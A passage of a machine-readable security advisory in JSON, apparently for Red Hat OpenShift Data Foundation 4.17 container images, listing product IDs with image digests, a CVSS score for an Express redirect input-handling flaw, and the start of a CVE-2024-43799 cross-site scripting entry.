"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express: Improper Input Handling in Express Redirects"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
